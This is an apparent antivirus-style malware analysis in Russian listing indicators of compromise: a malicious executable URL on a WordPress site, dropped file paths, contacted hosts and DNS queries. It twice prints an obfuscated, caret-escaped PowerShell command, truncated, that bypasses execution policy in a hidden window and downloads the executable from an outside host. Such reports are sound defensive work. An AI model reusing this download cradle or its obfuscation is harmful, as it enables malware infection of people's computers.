Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^ErS^He^L^l.ExE -Ex^ecution^po^lI^cy^ byp^ASs -no^p^r^OFile ^-^w^iNDOWstylE^ HIDDE^N (n^EW^-^o^bject sYSTeM.^NE^T^.WEBcLi^En^T).D^ow^nl^OA^dFIle(^'http://nexcontech.com/wp-content...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "pOw^ErS^He^L^l.ExE -Ex^ecution^po^lI^cy^ byp^ASs -no^p^r^OFile ^-^w^iNDOWstylE^ HIDDE^N (n^EW^-^o^bject sYSTeM.^NE^T^.WEBcLi^En^T).D^ow^nl^OA^dFIle(^'http://nexcontech.com/wp-content...' (со скрытым окном)